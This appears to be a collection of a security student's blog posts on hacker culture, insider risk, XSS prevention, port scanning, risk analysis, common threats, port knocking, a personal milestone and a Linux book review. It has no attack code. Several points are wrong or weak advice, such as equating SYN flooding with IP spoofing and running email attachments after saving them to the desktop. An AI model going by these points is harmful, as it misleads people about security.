Social Culture of Hackers

Hacking is seen as an underground group. They are very social in nature. No man is an island in the hacker or security community. Hackers share information very liberally. Sites spring up every day to share tools, techniques, news, and other information to fellow hackers and security professionals. Security professionals need to be embracing joining the hacker community not in order to use the techniques of crackers, but so the techniques are known and defenses can be developed.

A couple of well known hacker underground sites include:

Hackers Center Security: http://forums.hackerscenter.com/index.php, T
he Hacker Community: http://www.hacker.org/,
The 2600: http://www.2600.com/
Defcon: http://www.defcon.org/.

Most of the hacker community never meets face-to-face. They hang out on irc, chat sites, and IM.
The only time a person get together are at Defcon and Blackhat security conferences.

Mailing lists and RSS feeds are the lifeblood to the security professional. Within the mailing lists and RSS feeds information is delivered as soon as it is available. If you keep up with the research and
security holes within software packages then you are better able to defend against these weaknesses.

Its a fine line between a criminal cracker and a security professional. They both use the same tools and techniques to defend and attack a computer security system. They both run in the same hacker
community because they are both curious about technology and gadgets. The only way you can tell the difference is by their actions.

Hackers have big egos. They love to talk and in most instance they love to share their secrets. Hacking is not hard. You just have to know what you want to accomplish before you start the hack. You can go to forums and chat sites and discover all sorts of new techniques and procedures to hack.

Personal Information as a Security Vector

Personal information such as SSN, medical records, and academic records are as secure as the knowledge that the staff has gained in order to protect the information. The security team can be well trained in computer and physical security. They can be the expert in the field of cryptography and a firewall or security architect, but if the security team does not train and pass along some of their knowledge then it will not be long before the information that they are trying to protect will be owned by an evil cracker that knows how to get within the company and compromise the integrity of the data.

No matter how good a security policy is companies are always vulnerable to penetration from the outside or even from the inside. Just this past week the employees of my company was told that we could no longer bring USB devices or any other storage devices including personal laptops because one employee was caught bringing company information to his home. Although I was not informed of what information the employee was taking home or why, the fact is that he brought the information home. We used to have a program that was supposed to encrypt the drive and the drive would then only be useful only on the computer that encrypt the drive, so I’m not sure what happened with that security measure. The bad thing is my company deals with social security
numbers and medical information every day, so I know that system and procedure would not be HIPPIA compliant.

Also it would not be hard to gather the username and password of the employees at the company because most of the time the information is on their desk or you can just ask them and they will be happy to give you the information, and most of the time the users do not lock their desktops when they leave their desks. This provides instant access to every SSN in the country and the person that would get called out would be the user because SSA knows who accesses what SSN and when it is accessed.

Remember to go to the training classes when offered. If you don't then you may unknowingly give out personal information that you may not have the right to release.

Part 2: Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is one of the most common application-layer web attacks. XSS targets scripts which are executed on the web browser rather than on the server-side. Cross-site scripting causes applications to execute in the manner desired by the malicious user. A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who now hijack the legitimate user's session.

As on-line business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Exploited XSS is commonly used to achieve the following malicious results:

Identity theft

Accessing sensitive or restricted information

Gaining free access to otherwise paid for content

Spying on user's web browsing habits

Altering browser functionality

Public defamation of an individual or corporation

Web application defacement

Denial of Service attacks

Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. The major cause of XSS is code validation within the application. A
lot of applications do not validate their input. They don't check to see if the code accepts non-malicious input.

Ways to Prevent Cross-Site Scripting Attacks

1.      Validate Code: Go through your code and test your code. Ask yourself, “If a person enters “code” in the textbox will the code execute.” The only way to discover this is to try to run “code” within the textbox. The most common code is SQL commands and JavaScript commands.

2.      Escaping: Escaping is using special characters as escape characters instead of actual characters such as <,>, &, !, etc.  

For more information on Cross-Site Scripting and other web application security check out OWASP.com at

http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

 

Web Application Security 101

Part One: An Introduction

Web applications are often the forgotten child of web designers and programmers. Why is that? It should look like web applications are the single most important code and process that needs to be taken into account when designing websites. After all you are trusting the websites to be trustworthy especially from established brick and mortar stores. That is where the problem lies. A lot of stores and websites are not used to designing security plans for collecting and processing customers' information.


I will discuss in the next coming weeks areas of vulnerabilities within websites that web designers and programmers need to take into consideration before creating the site. Security should not be taken for granted. Applications need to be designed from the ground up with security in mind. Most applications on the web are designed with security as an afterthought and do not include security checks in them until after there is a breach and it has reached the news media.

During this series of post we will discuss, cross-site scripting, SQL Injection, web site authorization, SSL vulnerabilities, man-in-the-middle attacks, and other topics as I think of it. :) The purpose of the articles is to inform both programmers and end-users what to look out for while exploring the website. Continue with me on this exciting journey, and we will both learn something and maybe better secure the Internet or at least bring about a better understanding and awareness of application security.


Thanks,

Lance Howell

Port Scanning

Port scanning is an invasive activity. Port scanning is the process of checking to see if a network is available or not. Port scanning can also cause denial of service on a network if it is scanned long enough. The type of scans that are done are half scans, FIN scans, XMAS scans and other stealth scans that could be used to penetrate a firewall. The ports can be filtered, opened, or closed.


Cases have been attempted to convict people for doing port scans, but the courts have time and time again said as long as people are just scanning they are not committing a crime. The rules do vary from state to state. One of the more famous cases is Moulton vs VC3 where Scott Moulton, a owner and operator of a security company was trying to test the county’s 911 system for vulnerabilities and discovered VC3’s firewall. The judge after Scott explained it to him agreed that it was not a crime. That was in 2000.

But just because it is not illegal by the law does not mean that it is not invasive and uses computer and network resources. It has to send traffic to each port in order to discover if it is an open or closed port. Even if you are not receiving data or information from the ports you are getting information about the network and the company’s network and infrastructure. You are learning how secure or unsecure they are. You in some instincts learn what programs or equipment they may be using.

Risk Analysis Life Cycle

1. Identify the Risk: Determine your assets and identify threats that are likely to attack those assets.
2. Assess the Risks: Determine the asset value. Produce a risk matrix to determine which risk is greater given the company’s environment. 
3. Develop Risk Management Plan: Set-up policies, procedures, and backup recovery plans. 
4. Implement Risk Management Actions: Put your policies and procedures in writing, do training and awareness with other employees. 
5. Re-evaluate the Risks: Every 6-months review your risks and policies and make sure they are still relevant. Determine what risk is most likely to still be compromised.

Common Threats and Safeguards to Be Aware of

Social Engineering is one of the most difficult hacking techniques to defend against because it is all about attacking the human elements. It is about manipulating employees and using non-technical means to discover information about the company or users to exploit them to gain access to the network. The best safeguard to use against social engineering is to educate the users and executives of the company. Educate them not to give personal private information to others without the employees knowing who they are. No one should have a need to know the user's password or access codes to their equipment. Train the employees on the proper way to discard sensitive information. Train them in not throwing papers with social security numbers or financial information in a regular trash can. Teach them the proper use of shredding material. Security is all about trusts and forming trust relationships. If you do not have trust then how can you be secure, that is why social engineering is so difficult to secure against because you are putting trust in your employees to not click on links in e-mails, give passwords to strangers, not to keep their passwords in the open, and not throw away sensitive information in normal trash.


A Denial of Service Attack (DoS) is attacks on a network and a web infrastructure. Its major objective is to prevent legitimate use of a network by preventing authorized access to resources, delay time critical operations, and by degradation of services. One of the most common types of DoS attacks is called TCP SYN Flooding also known as IP spoofing. A safeguard of this kind of attack is by installing a filtering router that restricts the input to your external interface, known as an input filter or ingress filter. You also should filter outgoing packets that have a source address different from your internal network to prevent a source IP spoofing attack from originating from your site.

E-Mail Attacks are very common as more people are being connected. You can have spam, phishing, and malware sent though e-mail. How do you safeguard against these types of attacks? It is simple don’t use e-mail. Make phone calls or send a letter to the person you are trying to reach. Those are not very good solutions. Just because a technology is not safe to use does not mean you cannot use it safely. If that were the case, why are you on a computer or using a pen or telephone? To protect your network from e-mail attacks remember to educate the users. Don’t click on links in an e-mail. If you have to go to the link open up a new browser and type that link in the browser. If you are told to log-in to your bank or credit card site then do it from the home page, and remember that a bank will never ask you to log in to change records or verify account information. If they do you need to change banks because they lack good Information Security procedures. Do not run a program from your e-mail. Save it to your desktop, and run it from there.

Knock, Knock Let Me In

Do you know who is trying to get in to your network. Someone is always knocking at your door. The doors of the network is called ports. Anyone working on my network should have a fairly good understanding and knowledge of why a port is open, and if they do not have a good reason for it to be open then close it. Port knocking provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. Some basic functionality needs to be provided with any port knocking implementation:

1. A way to monitor the firewall log file needs to be devised. 
2. A method to extract the sequences of ports from the log file and translate their payload into usable information. 
3. Once the information is obtained from the sequence, the implementation must provide some way to manipulate the firewall rules.

Port knocking sounds like a great solution when it comes to monitoring closed ports on a firewall, but it does come with a few disadvantages. You have to use client script in order to perform the knocks. This script should be kept a secret and on a removable media such as a USB drive. A number of ports need to be allocated for exclusive use by the system. Any system that manipulates firewall rules in an automated fashion requires careful implementation.

Awards and Achievement

Well it is 2:37pm and I am in the process of getting ready to be inducted into Alpha Beta Kapa National Honor's Society. I do admit I have worked hard towards this event. I know my family and I have both sacificed a lot and will sacifice a lot for this achievement. I have given up my weekends, most of my nights, and days. I could have been with my wife on those times, but my choices have lead me down this path. We both wonder sometimes if the pressure of school is worth it in the end...

I think it will be. I have just one goal, and that is to provide a better lifestyle for my wife and our future child together. That is what this degree is all about to me. Some of my classmates only sees it as a way to get a job and have fun. I see it more than that. I know my value, and I must convey that to any partential employees. That is way I will not settle for just any job it has to be that right job. I have done that before, and I will not go down that road again.

I am very excited about being a member of such a prestiagous organization. I am ready to prove everyone that I am smart and that the decision to go to school was the right one. By December I hope with the help of God that I will be Validictorian of my class. If not that then at least in the top ten percent. I just wish that I had applied myself like this in high school. I may would have turned out a little different. I finally get to right that wrong.

Back to the question... Is the ABK Honor important to me? Heck yes it is. Some people it may not be. I just hope that I can live up to the standards and do them and my family proud.

Risk Assessment Necessary Evil

This week I have been learning about doing risk assessment in order to inform how much companies would actually lose if the company lost equipment or data. I learned it is tough in coming up with all that could go wrong and with what is of value within a company that I need to take into account.

The hardest part of the "assessment" is assigning a numerical value. You have to think of the employee worth, and the amount of time that goes into the assessment. You also have to think of the time that it takes to replace the data and information that may be compromised if a system fails.

Will you be able to cover quickly? Remember that the longer your system and network may be down the longer you will be not satisfying customers' needs. You have to be prepared. Make the necessary backups, images, have the necessary disks. Do you have extra computer parts in case your system blows up? Are the backup and recovery procedures written down and are the staff prepared on how to implement those procedures. These are the questions to ask.

Systems should be operational within an hour. If it is not then something is wrong with your recovery procedure. The quicker you can get back to work the better. I know there are some extreme instances where that will not be possible, but that also needs to be taken into account.

As always leave me a comment about anything I say, and remember stay secure out there.

Linux in a Nutshell 5th Edition Review

Linux in a Nutshell, 5th Edition By: Ellen Siever, Aaron Weber, Stephen Figgins, Robert Love, Arnold Robbins, et al. is a fantastic reference book for both newbies to Linux or system administrators that have 20+ years of experience. The book is published by O'Reilly Media, which is the leader in great and easy to read technical book. The book is a massive 944 pages. Two-thirds of which is commands to use with linux and a detail and examples of most if not all the options with that command. If you are reading a forum post and want to find the truth about what that command is doing to the system then use this book to find that out so you want be left with possible deleting your system. The list of commands are in alphabetical order so they are easy to thumb to the correct command. It is great to learn about the commands. I think adding the commands in this kind of list and format is the best thing about the book. I will use that section for years to come. 

Also if you want to know about how to set up different services or servers running Linux you can with this book also. You can learn about DNS/BIND, SSH, file sharing, networking and a lot more within the other chapters of the book. 

My only caution with this book is that it is for the person wanting to become proficient in the use of the command line. It is not for the typical user unless you love the command line. If you are a casual user then I would recommend an Ubuntu book by O'Reilly. There are no graphics in the book, so you will know the command line by the time you study and read this book. Also you cannot understand the command line unless you use it day in and day out.

I give this book 4 out of 5 Penguins just because I wished they would have given more examples and covered more administration topics and expanded on them. But it is still a wonderful book and reference tool. It will stay next to me and my computer.